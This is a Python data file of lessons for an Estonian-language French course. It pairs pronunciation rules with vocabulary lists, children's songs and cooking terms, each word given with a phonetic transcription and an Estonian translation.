Reeglid.add_lesson(u"y", u"""
**y** hääldatakse alati **[i]** ja mitte kunagi **[ü]**.
""",ref="y")
Reeglid.parse_words(Nom,u"""
le cygne ['sinjə] : luik
le système [sis'tääm] : süsteem
le mythe [mit] : müüt
""")
Reeglid.add_lesson(u"œ", u"""
**œ** hääldatakse alati **[ÖÖ]**.
""",ref="oe")
Reeglid.parse_words(Nom,u"""
# le nœud [nöö] : sõlm
le cœur [kÖÖr] : süda
#le chœur [kÖÖr] : koor (laulu-)
le bœuf [bÖff] : härg
le œuf [Öf] : muna
la œuvre [ÖÖvrə] : töö, teos
le *hors d'œuvre [hOOr 'dÖÖvrə] : eelroog
""")
if HAS_FUN:
Fun.add_lesson(u"Frère Jacques", u"""
| Frère Jacques, frère Jacques,
| dormez-vous? Dormez-vous?
| Sonnez les matines, sonnez les matines
| ding, dang, dong! Ding, dang, dong!
""")
Fun.parse_words(NomPropre,u"""
Jacques [žaak] : Jaak
""")
Fun.parse_words(None,u"""
le frère [fräär] : vend
dormez-vous? [dOrmee'vu] : kas Te magate?
Sonnez les matines [sO'ne lä ma'tinə] : lööge hommikukellad
""")
Fun.add_lesson(u"Dans sa maison un grand cerf ", u"""
| Dans sa maison un grand cerf
| regardait par la fenêtre
| un lapin venir à lui
| et frapper ainsi.
| «Cerf, cerf, ouvre moi
| ou le chasseur me tuera!»
| «Lapin, lapin entre et viens
| me serrer la main.»
""")
Fun.parse_words(Verbe,u"""
il regardait [rəgar'dä] : ta vaatas
""")
Fun.parse_words(None,u"""
ouvre-moi [uuvrə'mwa] : tee mulle lahti
ou [u] : või
il me tuera [il mə tüə'ra] : ta tapab mind
serrer [sä'ree] : suruma
grand [grA~] | grande [grA~də]: suur
""")
Fun.parse_words(Nom,u"""
la maison [mä'zO~] : maja
le cerf [säär] : hirv
la fenêtre [fə'näätrə] : aken
le lapin [lapÄ~] : küünik
le chasseur [ša'sÖÖr] : jahimees
la main [mÄ~] : käsi
""")
Fun.add_lesson(u"Un kilomètre à pied", u"""
| Un kilomètre à pied,
| ça use, ça use,
| un kilomètre à pied,
| ça use les souliers.
""")
Fun.parse_words(None,u"""
le pied [pjee] : jalaots
à pied [a'pjee] : jalgsi
ça use [sa 'üüzə] : see kulutab
le soulier [sul'jee] : king
""")
Fun.add_lesson(u"La peinture à l'huile", u"""
| La peinture à l'huile
| c'est bien difficile
| mais c'est bien plus beau
| que la peinture à l'eau
""")
Fun.parse_words(None,u"""
la peinture [pÄ~'tüür] : värvimine
la huile [wilə] : õli
la eau [oo] : vesi
difficile [difi'silə] : raske
mais [mä] : aga
beau [boo] | belle [bälə] : ilus
plus beau [plü boo] : ilusam
""")
if HAS_FUN:
Fun.add_lesson(u"Meunier, tu dors", u"""
| Meunier, tu dors, ton moulin va trop vite.
| Meunier, tu dors, ton moulin va trop fort.
| Ton moulin, ton moulin va trop vite.
| Ton moulin, ton moulin va trop fort.
""")
Fun.parse_words(None,u"""
le meunier [mÖn'jee] : mölder
le moulin [mu'lÄ~] : veski
tu dors [dOOr] : sa magad
trop vite [tro'vitə] : liiga kiiresti
trop fort [tro'fOOr] : liiga kõvasti
""")
if HAS_FUN and FULL_CONTENT:
Fun.add_lesson(u"Minu onu...",
u"""
| Mon tonton et ton tonton sont deux tontons,
| mon tonton tond ton tonton
| et ton tonton tond mon tonton.
| Qu'est-ce qui reste?
""")
Fun.parse_words(None,u"""
mon [mO~] : minu
ton [tO~]: sinu
ils sont [sO~]: nad on
""")
Fun.parse_words(Numerique,u"""
deux [döö] : kaks
""")
Fun.parse_words(Nom,u"""
le tonton [tO~'tO~] : onu
""")
Fun.parse_words(Verbe,u"""
tondre [tO~drə] : pügama
rester [räs'tee] : üle jääma
""")
Fun.parse_words(None,u"""
Qu'est-ce qui reste? [käski'räst?] : Mis jääb üle?
""")
#~ """
#~ le nôtre ['nootrə] : meie oma
#~ """
Reeglid.add_lesson(u"on & om",
u"""
**on** ja **om** hääldatakse **[O~]**,
v.a. siis kui järgneb täishäälik või teine **n** või **m**.
""",ref="on")
Reeglid.parse_words(Nom,u"""
le salon [sa'lO~] : salong (= uhke tuba)
# un oncle [O~klə] : onu
la bombe ['bO~mbə] : pomm
""")
Reeglid.parse_words(Autre,u"""
bonjour [bO~'žuur] : tere | head päeva | tere hommikust
bonne nuit [bOnə 'nwi] : head ööd
bon appétit [bOnappe'ti] : head isu
""")
Reeglid.add_lesson(u"an & am",
u"""
**an** ja **am** hääldatakse **[A~]**,
v.a. siis kui järgneb täishäälik või teine **n** või **m**.
""",ref="an")
Reeglid.parse_words(Nom,u"""
le an [A~] : aasta
la année [a'nee] : aasta
la lampe [lA~p] : lamp
le enfant [A~'fA~] : laps
""")
Reeglid.add_lesson(u"en & em",
u"""
**en** ja **em** hääldatakse **[A~]**,
v. a. siis kui järgneb täishäälik või teine **n** või **m**.
""",ref="en")
Reeglid.parse_words(Nom,u"""
le rendez-vous [rA~de'vu] : kohtumine
# le commentaire [komA~'täär] : märkus, kommentar
le centre ['sA~trə] : keskus
le renne [rän] : põhjapõder
# le genre [žA~rə] : žanre
un enfant [A~'fA~] : laps
le employeur [A~plwa'jÖÖr] : tööandja
""")
Reeglid.add_lesson(u"un & um",
u"""
**um** ja **un** hääldatakse **[Ö~]**,
v.a. siis kui järgneb täishäälik või teine **m** / **n**.
""",ref="un")
Reeglid.parse_words(NomPropre,u"""
Verdun [vär'dÖ~] : -
""")
Reeglid.parse_words(Nom,u"""
le parfum [par'fÖ~] : hea lõhn v. maitse
""")
Reeglid.parse_words(Adjectif,u"""
parfumé [parfü'mee] | parfumée [parfü'mee] : lõhnastatud
brun [brÖ~] | brune [brün] : pruun
# aucun [o'kÖ~] | aucune [o'kün] : mitte üks
""")
#~ chacun [ža'kÖ~] | chacun [ža'kün] : igaüks
Reeglid.add_lesson(u"in & im",
u"""
**in** ja **im** hääldatakse **[Ä~]**,
v.a. siis kui järgneb täishäälik või teine **n** või **m**.
Vaata ka [ref ain].
""",ref="in")
Reeglid.parse_words(None,u"""
la information [Ä~formasjO~] : informatsioon
le imperméable [Ä~pärme'aablə] : vihmajope
la image [i'maaž] : pilt
le vin [vÄ~]: vein
le bassin [ba'sÄ~] : bassein
le dessin [de'sÄ~] : joonistus
je dessine [de'sin] : ma joonistan
""")
Reeglid.parse_words(Adjectif,u"""
inutile (mf) [inü'til] : kasutu
""")
#~ Reeglid.add_lesson(u"ain, aim, ein, eim",
#~ u"""
#~ Kui **a** või **e** on **in**/**im** ees,
#~ siis see sulab nendega kokku ja kaob ära.
#~ """,ref="ain")
#~ Reeglid.parse_words(Nom,u"""
#~ le pain [pÄ~] : sai | leib
#~ le gain [gÄ~] : kasu
#~ la main [mÄ~] : käsi
#~ la faim [fÄ~] : nälg
#~ """)
#~ Reeglid.parse_words(NomPropre,u"""
#~ Reims [rÄ~s] : (linn)
#~ """)
Reeglid.add_lesson(u"ain & aim",
u"""
**ain** ja **aim** hääldatakse **[Ä~]**. **a** ühineb **in**/**im**-ga ja kaob ära.
Sama loogika nagu [ref ein].
""",ref="ain")
Reeglid.parse_words(Nom,u"""
le pain [pÄ~] : sai | leib
# le gain [gÄ~] : kasu
la main [mÄ~] : käsi
la faim [fÄ~] : nälg
""")
Reeglid.add_lesson(u"ein & eim",
u"""
**ein** ja **eim** hääldatakse **[Ä~]**. **e** ühineb **in**/**im**-ga ja kaob ära.
Sama loogika nagu [ref ain].
""",ref="ein")
Reeglid.parse_words(Nom,u"""
le rein [rÄ~] : neer (anat.)
la reine [rään] : kuninganna
""")
Reeglid.parse_words(NomPropre,u"""
Reims [rÄ~s] : (linn)
""")
Reeglid.add_lesson(u"ien",
u"""
**ien** hääldatakse **[jÄ~]** v.a. siis kui järgneb teine **n**.
""",ref="ien")
Reeglid.parse_words(None,u"""
le chien [šiÄ~] : koer
la chienne [šjän] : emakoer
""")
Reeglid.parse_words(Autre,u"""
bien [biÄ~] : hästi
rien [riÄ~] : ei midagi
""")
Reeglid.add_lesson(u"oin",
u"""
**oin** hääldatakse **[wÄ~]**.
Reegel [ref oi] ei kehti sel juhul, sest *i* sulab *n*-iga kokku.
""",ref="oin")
Reeglid.parse_words(None,u"""
# le coin [kwÄ~] : nurk
le point [pwÄ~] : punkt
""")
Reeglid.parse_words(Autre,u"""
besoin [bə'zwÄ~] : vaja
# loin [lwÄ~] : kauge
""")
Reeglid.add_lesson(u"c", u"""
**c** hääldatakse **[s]** siis
kui järgneb **e**, **i** või **y**,
ja muidu **[k]** (ja mitte kunagi **[tš]**).
Sõna lõpus kaob mõnikord ära.
""",ref="c")
Reeglid.parse_words(None,u"""
la casserole [kas'roll] : kastrul
la confiture [kO~fi'tüür] : moos | keedis
la cuisse [kwis] : reis | kints
le certificat [särtifi'ka] : tsertifikaat
la cire [siir] : vaha
le centre ['sA~trə] : keskus
le cygne ['sinjə] : luik
la classe [klas] : klass
le tabac [ta'ba] : tubak
""")
Reeglid.parse_words(NomPropre,u"""
octobre [ok'tOObrə] : oktoober
Marc [mark] : Markus
""")
Reeglid.parse_words(Numerique,u"""
cinq [sÄ~k] : viis
""")
if FULL_CONTENT:
Reeglid.parse_words(None,u"""
le câble ['kaablə] : kaabel
la cible ['siiblə] : märklaud
la comédie [kome'dii] : komöödia
le comble ['kO~blə] : kõrgeim v. ülim aste
la cure [küür] : kuur
la croûte [krut] : koorik
un acacia [akasj'a] : akaatsia (põõsas)
""")
Reeglid.add_lesson(u"h", u"""
**h** ei hääldata kunagi.
""",ref="h")
#~ (Vaata ka [ref haspire])
Reeglid.parse_words(Nom,u"""
le hélicoptère [elikop'täär] : helikopter
le hôtel [o'täl] : hotell
le autel [o'täl] : altar
""")
if FULL_CONTENT:
Reeglid.add_lesson(u"h aspiré", u"""
Kuigi **h** ei hääldata kunagi ([vt. [ref h]]),
on neid kaks tüüpi: «h muet» (tumm h)
ja «h aspiré» (sisse hingatud h).
Viimane tähistatakse sõnaraamatutes tärniga (*).
Erinevus koosneb selles, kuidas eesolev sõna liitub nendega.
""",ref="haspire")
Reeglid.parse_words(Nom,u"""
le hélicoptère [elikop'täär] : helikopter
le hôtel [o'täl] : hotell
le homme [Om] : mees
le *haricot [ari'ko] : uba
le *héros [e'ro] : kangelane
le *hibou [i'bu] : öökull
""")
Reeglid.add_lesson(u"ch", u"""
**ch** hääldatakse tavaliselt **[š]** ja mõnikord (kreeka päritolu sõnades) **[k]**,
ja mitte kunagi **[tš]**.
""",ref="ch")
Reeglid.parse_words(Nom,u"""
le chat [ša] : kass
la biche [biš] : emahirv
le chœur [kÖÖr] : koor (laulu-)
le psychologue [psiko'lOOgə] : psüholoog
""")
"""
la chèvre ['šäävrə] : kits
la chambre [šA~mbrə] : tuba
le parachute [para'šüt] : langevari
le Christe [krist] : Kristus
une chope [žOp] : õlu
le chien [šjÄ~] : koer
un achat [a'ša] : ost
"""
Reeglid.add_lesson(u"ç", u"""
**ç** hääldatakse alati **[s]**.
""",ref="cedille")
Reeglid.parse_words(None,u"""
la leçon [lə~sO~]: lektsioon
# la rançon [rA~sO~]: lunaraha
le reçu [rə'sü] : kviitung
le maçon [ma'sO~] : müürsepp
""")
Reeglid.add_lesson(u"-er & -ez",
u"""
**-er** ja **-ez** sõna lõpus hääldatakse **[ee]**.
""",ref="er")
Reeglid.parse_words(None,u"""
manger [mA~'žee] : sööma
vous mangez [mA~'žee] : te sööte
aimer [ä'mee] : armastama
vous aimez [ä'mee] : te armastate
""")
Reeglid.add_lesson(u"-et",
u"""
**-et** sõna lõpus hääldatakse **[ä]**.
""",ref="et")
Reeglid.parse_words(None,u"""
le fouet [fu'ä] : vispel
le fumet [fü'mä] : hea lõhn (nt. veini, liha kohta)
""")
Reeglid.add_lesson(u"-ent",
u"""
**-ent** sõna lõpus hääldatakse **[ə]** siis kui tegemist
on *tegusõna kolmada mitmuse vormiga*.
Muidu kehtib reegel [ref en] (hääldatakse **[A~]**).
""",ref="ent")
Reeglid.parse_words(None,u"""
ils couvent [il 'kuuvə] : nad munevad
le couvent [ku'vA~] : klooster
souvent [su'vA~] : tihti
""")
Reeglid.add_lesson(u"j",
u"""
**j** hääldatakse **[ž]** (ja mitte [dž]).
""",ref="j")
Reeglid.parse_words(None,u"""
majeur [mažÖÖr] : suurem
je [žə] : mina
jamais [ža'mä] : mitte iialgi
""")
Reeglid.parse_words(NomPropre,u"""
Josephe [žo'zäf] : Joosep
""")
Reeglid.add_lesson(u"g",
u"""
**g** hääldatakse **[g]** kui järgneb **a**, **o**, **u**
või kaashäälik, aga **[ž]** kui järgneb **e**, **i** või **y**.
""",ref="g")
Reeglid.parse_words(None,u"""
le gorille [go'rijə] : gorilla
la gazelle [ga'zäl] : gasell
la giraffe [ži'raf] : kaelkirjak
# le gymnase [žim'naaz] : gümnaasium
# le juge [žüüž] : kohtunik
# la géologie [žeolo'žii] : geoloogia
général [žene'ral] : üldine
le général [žene'ral] : generaal
""")
Reeglid.add_lesson(u"gu",
u"""
**gu** hääldatakse **[g]** (s.t. **u** kaob ära)
siis kui järgneb **e**, **i** või **y**.
""",ref="gu")
Reeglid.parse_words(None,u"""
le guépard [ge'paar] : gepard
le guide [giid] : reisijuht
la guitare [gi'taar] : kitarr
la guerre [gäär] : sõda
Guy [gi] : (eesnimi)
Gustave [güs'taav] : (eesnimi)
aigu [ä'gü] : terav, ...
""")
Reeglid.add_lesson(u"gn", u"""
**gn** hääldatakse **[nj]**.
""",ref="gn")
Reeglid.parse_words(None,u"""
magnifique (nf) [manji'fik] : surepärane
le cognac [kon'jak] : konjak
le signal [sin'jal] : signaal
""")
#~ Reeglid.parse_words(Verbe,u"""
#~ soigner [swan'jee] : ravima | hoolitsema
#~ """)
Reeglid.parse_words(NomGeographique,u"""
Avignon [avin'jO~] : -
""")
#~ """
#~ la ligne ['linjə] : liin | rida
#~ le signe ['sinjə] : märk
#~ la besogne [bə'zOnjə] : töö | tegu | ülesanne
#~ """
Reeglid.add_lesson(u'il',
u"""
**il** (sõna lõpus ja kaashääliku taga)
hääldatakse kas **[i]** või **[il]**.
""",ref="il")
Reeglid.parse_words(None,u"""
il [il] : tema
le persil [pär'sil] : petersell
le outil [u'ti] : tööriist
# le fusil [fü'zi] : püss
subtil (m) [süp'til] : peen, subtiilne
gentil (m) [žA~'ti] : armas
# le exil [äg'zil] : eksiil
""")
Reeglid.add_lesson(u"ill", u"""
**ill** hääldatakse **[iij]** või **[ij]**.
Erandid on sõnad *ville* ja *mille*.
""",ref="ill")
Reeglid.parse_words(None,u"""
# la bille [biije] : kuul
la anguille [A~'giije] : angerjas
la myrtille [mir'tiije] : mustikas
la famille [fa'miije] : perekond
la cuillère [kwi'jäär] : lusikas
# le pillage [pij'aaž] : rüüstamine
""")
Reeglid.parse_words(None,u"""
la ville [vil] : linn
mille [mil] : tuhat
le million [mil'jO~] : miljon
""")
#~ tranquille [trA~kiije] : rahulik
Reeglid.add_lesson(u"ail",
u"""
**ail** hääldatakse **[aj]** :
siin ei kehti reegel [ref ai], sest *i* sulab *l*-iga kokku.
""",ref="ail")
Reeglid.parse_words(Nom,u"""
l'ail (m) [aj] : küüslauk
le travail [tra'vaj] : töö
le détail [detaj] : detail
# l'aile (f) [ääl] : tiib
""")
Reeglid.parse_words(NomGeographique,u"""
Versailles [ver'sajə] : Versailles
""")
Reeglid.add_lesson(u'eil',
u"""
**eil** ja **eille** hääldatakse **[eij]**.
""",ref="eil")
Reeglid.parse_words(None,u"""
le réveil [re'veij] : äratuskell
le soleil [so'leij] : päike
la merveille [mär'veij] : ime
merveilleux [märvei'jöö] : imeline
# le réveillon [revei'jO~] : vana-aasta õhtu söök
la groseille [gro'zeij] : sõstar (punane v. valge) | tikker
# vieille (f) [vjeij] : vana
# la veille [veij] : pühalaupäev
""")
Reeglid.add_lesson(u"ueil",u"""
**ueil** hääldatakse **[Öj]**.
""",ref="ueil")
Reeglid.parse_words(None,u"""
le accueil [a'kÖj] : vastuvõtt
le orgueil [Or'gÖj] : ülbus
""")
Reeglid.add_lesson(u"euil",
u"""
**euil** hääldatakse **[Öj]**.
""",ref="euil")
Reeglid.parse_words(None,u"""
le chevreuil [šəv'rÖj] : metskits
le écureuil [ekü'rÖj] : orav
""")
if False:
Pronounciation.add_lesson(u"[äär]", u"""
Kui kuuled [äär], siis kirjutad kas **ère**, **aire**, **ère**, **erre** või **er**.
""")
Pronounciation.parse_words(None,u"""
le père [päär] : isa
la paire [päär] : paar
le maire [määr] : linnapea
la mère [määr] : ema
la mer [määr] : meri
amer (m) [a'määr] : kibe
la bière [bjäär] : õlu
la pierre [pjäär] : kivi
la terre [täär] : muld
""")
if FULL_CONTENT:
Eestlastele.add_lesson(u"v ja f", u"""
Ettevaatust, **v** ei ole **f**!
""")
Eestlastele.parse_words(None,u"""
vous [vu] : teie
fou [fu] : hull
# vous êtes fous [vu'zäät fu] : te olete lollid
je veux [žə vöö] : ma tahan
le feu [föö] : tuli
la fille [fiij] : tüdruk | tütar
la vie [vii] : elu
la fin [fÄ~] : lõpp
le vin [vÄ~] : vein
""")
Eestlastele.add_lesson("gn ja ng", """
Ettevaatust, **gn** ei ole **ng**!
""")
Eestlastele.parse_words(Nom,u"""
le ange [A~ž] : ingel
le agneau [an'joo] : tall
le singe [sÄ~ž] : ahv
le signe ['sinjə] : märk
le linge [lÄ~ž] : pesu
la ligne ['linjə] : liin | rida
le songe [sO~ž] : unenägu
la besogne [bə'zOnjə] : ülesanne | kohustus
""")
Eestlastele.add_lesson(u"Sugu on oluline", u"""
Siin mõned näited, et sugu pole sugugi ebatähtis.
""")
Eestlastele.parse_words(Nom,u"""
le père [päär] : isa
la paire [päär] : paar
le maire [määr] : linnapea
la mère [määr] : ema
le tour [tuur] : tiir
la tour [tuur] : torn
le mur [müür] : sein | müür
la mûre [müür] : põldmari
le cours [kuur] : kursus | tund (koolis)
la cour [kuur] : õu, hoov | kohus
""")
#~ Eestlastele.parse_words(None,u"""
#~ court (m) [kuur] : lühike
#~ """)
Eestlastele.add_lesson(u"Ära aja segamini!", u"""
Mõned harjutused veel...
""")
Eestlastele.parse_words(Autre,u"""
ces ingrédients [säz Ä~gre'djA~] : need koostisained
c'est un crétin [sätÖ~ kre'tÄ~] : ta on kretiin
je dors [žə dOOr] : ma magan
j'ai tort [žee tOOr] : ma eksin
""")
Eestlastele.parse_words(Nom,u"""
la jambe [žA~mbə] : jalg
la chambre [šA~mbrə] : tuba
le agent [la' žA~] : agent
le chant [lə šA~] : laul
les gens [žA~] : inimesed, rahvas
les chants [šA~] : laulud
""")
if False:
Eestlastele.parse_words(None,u"""
le loup [lu] : hunt
la loupe [lup] : luup
la joue [žuu] : põsk
le jour [žuur] : päev
mou (m) [mu] : pehme
""")
#~ Reeglid.parse_words(NomPropre,u"""
#~ Winnetou [winə'tu] : (isegi maailmakuulsa apatši pealiku nime hääldavad prantslased valesti)
#~ """)
General.add_lesson(u"Tervitused", u"""
""")
General.parse_words(Autre,u"""
salut [sa'lü] : tervist
bonjour [bO~'žuur] : tere | head päeva | tere hommikust
bonsoir [bO~'swaar] : head õhtut
bonne nuit [bOnə 'nwi] : head ööd
au revoir [orə'vwaar] : nägemiseni
Monsieur [məs'jöö] : härra
Madame [ma'dam] : proua
Mademoiselle [madəmwa'zel] : preili
Comment t'appelles-tu? [ko'mA~ ta'päl tü] : Kuidas on sinu nimi?
Je m'appelle... [zə ma'päl] : Minu nimi on...
Comment vas-tu? [ko'mA~va'tü] : Kuidas sul läheb?
s'il vous plaît [silvu'plä] : palun (Teid)
s'il te plaît [siltə'plä] : palun (Sind)
merci [mer'si] : aitäh
merci beaucoup [mer'si bo'ku] : tänan väga
oui [wi] : jah
non [nO~] : ei
bon appétit [bOnappe'ti] : head isu
j'ai faim [žee fÄ~] : mul on kõht tühi
j'ai soif [žee swaf] : mul on janu
je suis fatigué [žə swi fati'gee] : ma olen väsinud
""")
if FULL_CONTENT:
General.add_lesson(u"Prantsuse automargid",columns=[FR,PRON],show_headers=False)
General.parse_words(NomPropre,u"""
Peugeot [pö'žo] : -
Citroën [sitro'än] : -
Renault [re'noo] : -
""")
General.add_lesson(u"Prantsuse eesnimed", u"""
""")
General.parse_words(NomPropre,u"""
Albert [al'bäär] : -
André [A~'dree] : Andre
Anne [anə] : Anne
Bernard [bär'naar] : -
Catherine [kat'rin] : Katrin
Charles [šarl] : Karl
François [frA~'swa] : -
Isabelle [iza'bäl] : Isabel
Jacques [žaak] : Jaak
Jean [žA~] : Jaan
Luc [lük] : Luukas
Marie [ma'rii] : Maria
Paul [pOl] : Paul
Philippe [fi'lip] : Filip
Pierre [pjäär] : Peeter
""")
General.add_lesson(u"Taluloomad", u"""
""")
General.parse_words(Nom,u"""
la chèvre ['šäävrə] : kits
la brebis [brə'bis] : lammas
le porc [pOOr] : siga
le cochon [ko'šO~] : siga
le cheval [šə'val] : hobune
la vache [vaš] : lehm
le taureau [to'roo] : pull
le veau [voo] : vasikas
le bœuf [bÖff] : härg
""")
General.add_lesson(u"Metsloomad", u"""
""")
General.parse_words(Nom,u"""
la chasse [šas] : jaht
le chasseur [ša'sÖÖr] : jahimees
le chevreuil [šəv'rÖj] : metskits
le cerf [säär] : hirv
la biche [biš] : emahirv
un élan [e'lA~] : põder
le lapin [la'pÄ~] : küülik
le lièvre [li'äävrə] : jänes
le renard [rə'naar] : rebane
un écureuil [ekü'rÖj] : orav
la souris [su'ri] : hiir
le blaireau [blä'roo] : mäger | habemeajamispintsel
le *hérisson [eri'sO~] : siil
la hermine [är'min] : hermeliin
la martre ['martrə] : nugis
la belette [bə'lät] : nirk
le loup [lu] : hunt
un ours [urs] : karu
le lynx [lÄ~ks] : ilves
le sanglier [sA~gli'e] : metssiga
le marcassin [marka'sÄ~] : metsseapõrsas
""")
# belette : nirk
if HAS_FUN and FULL_CONTENT:
Fun.add_lesson(u"Au clair de la lune", u"""
| Au clair de la lune,
| Mon ami Pierrot,
| Prête-moi ta plume
| Pour écrire un mot.
| Ma chandelle est morte,
| Je n'ai plus de feu ;
| Ouvre-moi ta porte,
| Pour l'amour de Dieu.
""")
Fun.parse_words(None,u"""
le clair de lune : kuuvalgus
un ami : sõber
""")
Fun.parse_words(Verbe,u"""
prêter : laenama
écrire : kirjutama
ouvrir : avama
""")
Fun.parse_words(None,u"""
la plume : sulg
""")
Fun.parse_words(Verbe,u"""
""")
Fun.parse_words(None,u"""
le mot : sõna
la chandelle : küünlalamp
""")
Fun.parse_words(Adjectif,u"""
mort | morte (adj.) : surnud
""")
Fun.parse_words(None,u"""
le feu [föö] : tuli
la porte [pOrt] : uks
un amour : armastus
Dieu : Jumal
""")
if HAS_FUN:
Fun.add_lesson(u"Sur le pont d'Avignon", u"""
| Sur le pont d'Avignon,
| on y danse, on y danse ;
| Sur le pont d’Avignon,
| on y danse tous en rond !
|
| Les beaux messieurs font comme ça,
| et puis encore comme ça.
|
| Les belles dames font comme ça,
| et puis encore comme ça.
|
| Les cordonniers font comme ça,
| et puis encore comme ça.
""")
Fun.parse_words(None,u"""
sur : peal
le pont [pO~] : sild
on danse tous ['dA~sə] : me kõik tantsime
en rond : ringis
les beaux messieurs : ilusad härrad
les belles dames : ilusad daamid
ils font [il fO~] : nad teevad
comme ci [kOm'sa] : niimoodi
comme ça [kOm'sa] : naamoodi
et puis encore [e pwi A~'kOOr] : ja siis veel
le cordonnier [kOrdon'jee] : kingsepp
""")
if HAS_FUN and FULL_CONTENT:
Fun.add_lesson(u"J'ai du bon tabac", u"""
| J'ai du bon tabac dans ma tabatière,
| J'ai du bon tabac, tu n'en auras pas.
| J'en ai du fin et du bien râpé
| Mais, ce n'est pas pour ton vilain nez
| J'ai du bon tabac dans ma tabatière
| J'ai du bon tabac, tu n'en auras pas
""")
if FULL_CONTENT:
General.add_lesson(u"Linnud", u"""
""")
General.parse_words(Nom,u"""
le oiseau [wa'zoo] : lind
la poule [pul] : kana
le poulet [pu'lä] : tibu | kanapoeg
la oie [wa] : hani
le dindeon [dÄ~dO~] : kalkun
la dinde [dÄ~də] : emakalkun
le pigeon [pi'žO~] : tuvi
""")
Kokadele.add_lesson(u"Katame lauda!", u"""
""")
Kokadele.parse_words(Nom,u"""
la table ['taablə] : laud
la chaise [šääz] : tool
le couteau [ku'too] : nuga
la fourchette [fur'šet] : kahvel
la cuillère [kwi'jäär] : lusikas
les couverts [ku'väär] : noad-kahvlid
la assiette [as'jät] : taldrik
le bol [bOl] : joogikauss
le verre [väär] : klaas
la tasse [tas] : tass
le plat [pla] : kauss
""")
Kokadele.add_lesson(u"Joogid", u"""""")
Kokadele.parse_words(Nom,u"""
la boisson [bwa'sO~] : jook
la bière [bjäär] : õlu
la eau [oo] : vesi
le jus [žu] : mahl
le café [ka'fee] : kohv
le thé [tee] : tee
le vin rouge [vÄ~ 'ruuz]: punane vein
le vin blanc [vÄ~ 'blA~]: valge vein
le vin rosé [vÄ~ ro'zee] : roosa vein
le cidre ['siidrə] : siider
la région [rež'jO~] : regioon, ala
le terroir [ter'waar] : geograafiline veinirühm
la appellation d'origine contrôlée (AOC) [apela'sjO~ dori'žin kO~trO'lee] : kontrollitud päritolumaa nimetus
la bavaroise [bavaru'aaz] : jook teest, piimast ja liköörist
""")
Kokadele.add_lesson(u"Menüü", intro=u"""""")
Kokadele.parse_words(Nom,u"""
le plat [pla] : roog
le plat du jour [pla dü žuur] : päevapraad
le *hors d'œuvre [OOr 'dÖÖvrə] : eelroog
le dessert [des'säär] : magustoit
""")
Kokadele.add_lesson(u"Supid", u"""
""")
Kokadele.parse_words(Nom,u"""
la soupe [sup] : supp
le potage [po'taaž] : juurviljasupp
le potage purée [po'taažə pü'ree] : püreesupp
le velouté [vəlu'tee] : koorene püreesupp
le velouté Dubarry [vəlu'tee düba'ri] : koorene püreesupp lillkapsaga
le bouillon [bui'jO~] : puljong
le consommé [kO~som'mee] : selge puljong
le consommé de volaille [kO~som'mee də vo'lajə] : linnulihast puljong
le consommé de gibier [kO~som'mee də žib'jee] : ulukilihast puljong
le consommé de poisson [kO~som'mee də pwa'sO~] : kala puljong
le consommé double [kO~som'mee 'duublə] : kahekordne puljong
#rammuleem?
""")
Kokadele.add_lesson(u"Liha", u"""
""")
Kokadele.parse_words(Nom,u"""
la viande [vjA~də] : liha
la volaille [vo'lajə] : linnuliha
le poulet [pu'lä] : kana
le gibier [žibiee] : jahiloomad
la boucherie [bušə'rii] : lihakauplus, lihakarn
le lard [laar] : pekk
le jambon [žA~'bO~] : sink
la saucisse [soo'sis] : vorst
la graisse [gräs] : rasv
le os [os] : kont
la côte [koot] : ribi
le dos [do] : selg
la cuisse [kwis] : kints
la langue [lA~gə] : keel
le foie [fwa] : maks
les tripes [trip] : soolestik
le cœur [kÖÖr] : süda
le rognon [ron'jO~] : neer (kulin.)
la cervelle [ser'vell] : aju
les abats [a'ba] : subproduktid (maks,süda, neerud, keel, jalad)
""")
Kokadele.add_lesson(u"Kala", u"""
""")
Kokadele.parse_words(Nom,u"""
le poisson [pwa'sO~] : kala
les crustacés [krüsta'see] : karploomad | koorikloomad
le brochet [bro'šä] : haug
la anguille [A~'giijə] : angerjas
la perche [pärš] : ahven
le *hareng [ar'A~] : heeringas
le sprat [sprat] : sprot
le thon [tO~] : tuunikala
le requin [rə'kÄ~] : haikala
""")
Kokadele.add_lesson(u"Liharoad", u"""""")
Kokadele.parse_words(Nom,u"""
la escalope [eska'lOp] : eskalopp, šnitsel
le ragoût [ra'gu] : raguu
la roulade [ru'laadə] : rulaad
la paupiette [pop'jät] : liharull
le aspic [as'pik] : sült
le filet [fi'lä] : filee | võrk
le bifteck [bif'täk] : biifsteek
la brochette [bro'šät] : lihavarras, šašlõk
les attereaux [attə'roo] : fritüüris praetud varras, paneeritud šašlõk
la côtelette [kot'lät] : naturaalne kotlet
la côtelette de porc [kot'lät də pOOr] : sealiha kotlet
la noisette de porc [nwa'zät də pOOr] : filee sealiha
le goulasch [gu'laš] : guljašš
le *hachis [ha'ši] : hakkliha
la boulette [bu'lett] : lihapall
le tournedos [turnə'do] : veise sisefilee portsjon toode
la entrecôte [A~trə'koot] : antrekoot
le Chateaubriand [šatobri'A~] : praetud liharoog
le carré d'agneau [ka'ree dan'joo] : praetud tallerind
la poitrine d'agneau farcie [pwa'trin dan'joo far'sii] : täidetud tallerind
le cœur de filet [kÖÖr də fi'lä] : veise sisefilee
le filet mignon [fi'lä min'jO~] : veise sisefilee portsjon toode
le filet médaillon [fi'lä meda'jO~] : medaljon (veise sisefilee portsjon toode)
le médaillon de veau [meda'jO~ də'voo] : vasika medaljon
le bœuf bourguignon [bÖff burgin'jO~] : härjapraad burgundia veiniga
le bœuf à la tartare [bÖff a la tar'taar] : väiketükiline toode sisefileest
le bœuf à la Strogonov [bÖff a la strogo'nov] : böfstrogonov
le sauté de bœuf à la suédoise [so'tee də bÖff a la süee'dwaazə] : klopsid
le sauté de veau [so'tee də voo] : pajaroog vasikalihast
la selle de mouton [säl də mu'tO~] : lamba (talle) sadul
""")
Kokadele.add_lesson(u"Road", intro=u"""""")
Kokadele.parse_words(Nom,u"""
la purée [pü'ree] : püree
le œuf [Öf] : muna
les œufs brouillés [öö brui'jee] : omlett
les œufs pochés [öö po'šee] : ilma kooreta keedetud muna
le gratin [gra'tÄ~] : gratään (ahjus üleküpsetatud roog)
le gratin dauphinois [gra'tÄ~ dofinw'a] : (tuntud retsept)
le gratin savoyard [gra'tÄ~ savwa'jaar] : (juustuga gratin dauphinois)
le soufflé [suff'lee] : suflee
la quiche lorraine [kiš lo'rään] : quiche
la pâte brisée [paat bri'zee] : (Mürbeteig, shortcrust pastry)
la tourte [turt] : (ingl. *pie*)
la fondue [fO~'düü] : fondüü
le fumet [fü'mä] : hea lõhn (nt. veini, liha kohta)
